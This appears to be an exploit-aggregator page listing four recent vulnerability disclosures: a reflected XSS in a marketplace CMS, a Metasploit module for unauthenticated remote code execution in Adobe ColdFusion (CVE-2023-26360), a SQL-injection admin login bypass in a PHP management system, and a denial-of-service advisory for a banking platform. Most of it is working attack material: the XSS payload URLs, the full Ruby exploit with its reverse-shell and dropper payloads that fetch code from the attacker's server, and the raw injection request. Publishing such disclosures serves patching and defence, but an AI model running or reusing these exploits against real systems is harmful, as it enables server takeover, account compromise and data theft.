Latest exploits :: CodePwn

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : mybizcms.com │ │ Vendor : MyBizCMS │ │ Software : Emporium Multi-Vendor 2.1 - eCommerce Marketplace Platform CMS │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /search GET parameter 'q' is vulnerable to RXSS https://website/search?q=nyqm1%22%3e%3cscript%3ealert(1)%3c%2fscript%3erw4xg&pg=8 GET parameter 'pg' is vulnerable to RXSS https://website/search?q=&pg=8ej3m8%3cscript%3ealert(1)%3c%2fscript%3ezxubp [-] Done </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Adobe ColdFusion Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to gain remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'sf', # MSF Exploit & Rapid7 Analysis ], 'References' => [ ['CVE', '2023-26360'], ['URL', 'https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis'] ], 'DisclosureDate' => '2023-03-14', 'Platform' => %w[java win linux unix], 'Arch' => [ARCH_JAVA, ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, # Code execution as 'NT AUTHORITY\SYSTEM' on Windows and 'nobody' on Linux. 'WfsDelay' => 30, 'Targets' => [ [ 'Generic Java', { 'Type' => :java, 'Platform' => 'java', 'Arch' => [ ARCH_JAVA ], 'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_tcp' } }, ], [ 'Windows Command', { 'Type' => :cmd, 'Platform' => 'win', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } }, ], [ 'Windows Dropper', { 'Type' => :dropper, 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], 'CmdStagerFlavor' => [ 'certutil', 'psh_invokewebrequest' ], 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' } } ], [ 'Unix Command', { 'Type' => :cmd, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' } }, ], [ 'Linux Dropper', { 'Type' => :dropper, 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'CmdStagerFlavor' => [ 'curl', 'wget', 'bourne', 'printf' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ], ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ # The following artifacts will be left on disk: # The compiled CFML class generated from the poisoned coldfusion-out.log (Note: the hash number will vary) # * Windows: C:\ColdFusion2021\cfusion\wwwroot\WEB-INF\cfclasses\cfcoldfusion2dout2elog376354580.class # * Linux: /opt/ColdFusion2021/cfusion/wwwroot/WEB-INF/cfclasses/cfcoldfusion2dout2elog181815836.class # If a dropper payload was used, a file with a random name may be left. # * Windows: C:\Windows\Temp\XXXXXX.exe # * Linux: /tmp/XXXXXX ARTIFACTS_ON_DISK, # The following logs will contain IOCs: # C:\ColdFusion2021\cfusion\logs\coldfusion-out.log # C:\ColdFusion2021\cfusion\logs\exception.log # C:\ColdFusion2021\cfusion\logs\application.log IOC_IN_LOGS ], 'RelatedModules' => [ 'auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360' ] } ) ) register_options( [ Opt::RPORT(8500), OptString.new('URIPATH', [false, 'The URI to use for this exploit', '/']), OptString.new('CFC_ENDPOINT', [true, 'The target ColdFusion Component (CFC) endpoint', '/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc']), OptString.new('CF_LOGFILE', [true, 'The target log file, relative to the wwwroot folder.', '../logs/coldfusion-out.log']) ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/' ) return CheckCode::Unknown('Connection failed') unless res # We cannot identify the ColdFusion version through a generic technique. Instead we use the Recog fingerprint # to match a ColdFusion cookie, and use this information to detect ColdFusion as being present. # https://github.com/rapid7/recog/blob/main/xml/http_cookies.xml#L69 if res.get_cookies =~ /(CFCLIENT_[^=]+|CFGLOBALS|CFID|CFTOKEN)=|.cfusion/ return CheckCode::Detected('ColdFusion detected but version number is unknown.') end CheckCode::Unknown end def exploit unless datastore['CFC_ENDPOINT'].end_with?('.cfc') fail_with(Failure::BadConfig, 'The CFC_ENDPOINT must point to a .cfc file') end case target['Type'] when :java # Start the HTTP server start_service # Trigger a loadClass request via java.net.URLClassLoader trigger_urlclassloader # Handle the payload... handler when :cmd execute_command(payload.encoded) when :dropper execute_cmdstager end end def on_request_uri(cli, _req) if target['Type'] == :java print_status('Received payload request, transmitting payload jar...') send_response(cli, payload.encoded, { 'Content-Type' => 'application/java-archive', 'Connection' => 'close', 'Pragma' => 'no-cache' }) else super end end def trigger_urlclassloader # Here we construct a CFML payload to load a Java payload via URLClassLoader. # NOTE: If our URL ends with / a XXX.class is loaded, if no trailing slash then a JAR is expected to be returned. cf_url = Rex::Text.rand_text_alpha_lower(4) srvhost = datastore['SRVHOST'] # Ensure SRVHOST is a routable IP address to our RHOST. if Rex::Socket.addr_atoi(srvhost) == 0 srvhost = Rex::Socket.source_address(rhost) end # Create a URL pointing back to our HTTP server. cfc_payload = "<cfset #{cf_url} = createObject('java','java.net.URL').init('http://#{srvhost}:#{datastore['SRVPORT']}')/>" cf_reflectarray = Rex::Text.rand_text_alpha_lower(4) # Get a reference to java.lang.reflect.Array so we can create a URL[] instance. cfc_payload << "<cfset #{cf_reflectarray} = createObject('java','java.lang.reflect.Array')/>" cf_array = Rex::Text.rand_text_alpha_lower(4) # Create a URL[1] instance. cfc_payload << "<cfset #{cf_array} = #{cf_reflectarray}.newInstance(#{cf_url}.getClass(),1)/>" # Set the first element in the array to our URL. cfc_payload << "<cfset #{cf_reflectarray}.set(#{cf_array},0,#{cf_url})/>" cf_loader = Rex::Text.rand_text_alpha_lower(4) # Create a URLClassLoader instance. cfc_payload << "<cfset #{cf_loader} = createObject('java','java.net.URLClassLoader').init(#{cf_array},javaCast('null',''))/>" # Load the remote JAR file and instantiate an instance of metasploit.Payload. cfc_payload << "<cfset #{cf_loader}.loadClass('metasploit.Payload').newInstance().main(javaCast('null',''))/>" execute_cfml(cfc_payload) end def execute_command(cmd, _opts = {}) cf_param = Rex::Text.rand_text_alpha_lower(4) # If the cf_param is present in the HTTP requests www-form encoded data then proceed with the child tags. cfc_payload = "<cfif IsDefined('form.#{cf_param}') is 'True'>" # Set our cf_param with the data in the requests form data, this is the command to run. cfc_payload << "<cfset #{cf_param}=form.#{cf_param}/>" # Here we construct a CFML payload to stage the :cmd and :dropper commands... shell_name = nil shell_arg = nil case target['Platform'] when 'win' shell_name = 'cmd.exe' shell_arg = '/C' when 'linux', 'unix' shell_name = '/bin/sh' shell_arg = '-c' end cf_array = Rex::Text.rand_text_alpha_lower(4) # Create an array of arguments to pass to exec() cfc_payload << "<cfset #{cf_array}=['#{shell_name}','#{shell_arg}',#{cf_param}]/>" cf_runtime = Rex::Text.rand_text_alpha_lower(4) # Get a reference to the java.lang.Runtime class. cfc_payload << "<cfobject action='create' type='java' class='java.lang.Runtime' name='#{cf_runtime}'/>" # Call the static Runtime.exec method to execute our string array holding the command and the arguments. cfc_payload << "<cfset #{cf_runtime}.getRuntime().exec(#{cf_array})/>" # The end of the If tag. cfc_payload << '</cfif>' execute_cfml(cfc_payload, cf_param, cmd) end def execute_cfml(cfml, param = nil, param_data = nil) cfc_payload = '<cftry>' cfc_payload << cfml cfc_payload << "<cfcatch type='any'>" cfc_payload << '</cfcatch>' cfc_payload << '<cffinally>' # Clear the CF_LOGFILE which will contain this CFML code. We need to do this so we can repeatedly execute commands. # GetCurrentTemplatePath returns 'C:\ColdFusion2021\cfusion\wwwroot\..\logs\coldfusion-out.log' as this is the # template we are executing. cfc_payload << "<cffile action='write' file='#GetCurrentTemplatePath()#' output=''></cffile>" cfc_payload << '</cffinally>' cfc_payload << '</cftry>' # We can only log ~950 characters to a log file before the output is truncated, so we enforce a limit here. unless cfc_payload.length < 950 fail_with(Failure::BadConfig, 'The CFC payload is too big to fit in the log file') end # We dont need to call a valid CFC method, so we just create a random method name to supply to the server. cfc_method = Rex::Text.rand_text_alpha_lower(1..8) # Perform the request that writes the cfc_payload to the CF_LOGFILE. res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(datastore['CFC_ENDPOINT']), 'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' }, 'vars_post' => { '_variables' => "{#{cfc_payload}" } ) unless res && res.code == 200 && res.body.include?('<title>Error</title>') fail_with(Failure::UnexpectedReply, 'Failed to plant the payload in the ColdFusion output log file') end # The relative path from wwwroot to the CF_LOGFILE. cflog_file = datastore['CF_LOGFILE'] # To construct the arbitrary file path from the attacker provided class name, we must insert 1 or 2 characters # to satisfy how coldfusion.runtime.JSONUtils.convertToTemplateProxy extracts the class name. if target['Platform'] == 'win' classname = "#{Rex::Text.rand_text_alphanumeric(1)}#{cflog_file.gsub('/', '\\')}" else classname = "#{Rex::Text.rand_text_alphanumeric(1)}/#{cflog_file}" end json_variables = "{\"_metadata\":{\"classname\":#{classname.to_json}},\"_variables\":[]}" vars_post = { '_variables' => json_variables } unless param.nil? || param_data.nil? vars_post[param] = param_data end # Perform the request that executes the CFML we wrote to the CF_LOGFILE, while passing the shell command to be # executed as a parameter which will in turn be read back out by the CFML in the cfc_payload. res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(datastore['CFC_ENDPOINT']), 'vars_get' => { 'method' => cfc_method, '_cfclient' => 'true' }, 'vars_post' => vars_post ) unless res && res.code == 200 && res.body.include?('<title>Error</title>') fail_with(Failure::UnexpectedReply, 'Failed to execute the payload in the ColdFusion output log file') end end end </code></pre>

<pre><code>## Title: Old Age Home Management-2022-2023-1.0 SQLi-Bypass-Authentication-Account-Take-Over ## Author: nu11secur1ty ## Date: 04.29.2023 ## Vendor: BY ANUJ KUMAR, https://phpgurukul.com/author/anujk305/ ## Software: https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/#google_vignette ## Reference: https://portswigger.net/web-security/sql-injection/lab-login-bypass ## Description: The username parameter appears to be vulnerable to SQL injection attacks. The payloads nu11secur1ty' or 1=1# or nu11secur1ty%27+or+1%3D1%23 were each submitted in the username parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker easily can take control over the admin account and then everything will be lost for this app and the users who are using it. STATUS: CRITICAL [+]Exploit: ```MYSQL POST /oahms/admin/login.php HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=n8igimmg4o7ddmpnbfueujouvg Content-Length: 62 Cache-Control: max-age=0 Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://pwnedhost.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://pwnedhost.com/oahms/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close username=nu11secur1ty%27+or+1%3D1%23&password=password&submit= ``` [+]Responce: ```HTTP HTTP/1.1 200 OK Date: Sat, 29 Apr 2023 05:32:07 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0 Content-Security-Policy: upgrade-insecure-requests; X-Powered-By: PHP/8.2.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13518 <!DOCTYPE html> <html lang="en"> <head> <title>Old Age Home Management System|| Dashboard</title>  <link rel="stylesheet" href="vendors/typicons/typicons.css"> <link rel="stylesheet" href="vendors/css/vendor.bundle.base.css"> <link rel="stylesheet" href="css/vertical-layout-light/style.css">  </head> ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ANUJ-KUMAR/Old-Age-Home-Management-2022-2023-1.0) ## Proof and Exploit [href](https://streamable.com/qtj0bz) ## Time spend: 00:30:00 </code></pre>

<pre><code>CVE-2023-30455 [Description] An issue was discovered in ebankIT before version 7. A Denial-of-Service attack is possible through the GET parameter EStatementsIds located on the /Controls/Generic/EBMK/Handlers/EStatements/DownloadEStatement.ashx endpoint. The GET parameter accepts over 100 comma-separated e-statement IDs without throwing an error. When this many IDs are supplied, the server takes around 60 seconds to respond and successfully generate the expected ZIP archive (during this time period, no other pages load). A threat actor could issue a request to this endpoint with 100+ statement IDs every 30 seconds, potentially resulting in an overload of the server for all users. ------------------------------------------ [VulnerabilityType Other] Denial of Service ------------------------------------------ [Vendor of Product] ebankIT ------------------------------------------ [Affected Product Code Base] ebankIT - Omnichannel Digital Banking Platform - Version 6, patched in version 7 ------------------------------------------ [Affected Component] The endpoint existing at /Controls/Generic/EBMK/Handlers/EStatements/DownloadEStatement.ashx?EStatementsIds=*id*,*id*,*id*,etc ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Denial of Service] true ------------------------------------------ [Attack Vectors] I discovered it was possible to perform a Denial-of-Service attack on the ebankIT platform, potentially resulting in a single user rendering the entire application inaccessible. The vulnerable endpoint exists on /Controls/Generic/EBMK/Handlers/EStatements/DownloadEStatement.ashx and the EStatementsIds GET parameter accepts over 100 comma-separated e-statement IDs without throwing an error. When this many IDs are supplied, the server takes around 60 seconds to respond and successfully generate the expected zip file (during this 60 seconds, no other pages load). A threat actor could issue a request to this endpoint with 100+ statement ID s every 30 seconds, potentially resulting in overloading the server for all users of the ebankIT platform. I believe this is being caused by a thread commitment issue where there are no dedicated threads to individual processes. ------------------------------------------ [Discoverer] Jake Murphy </code></pre>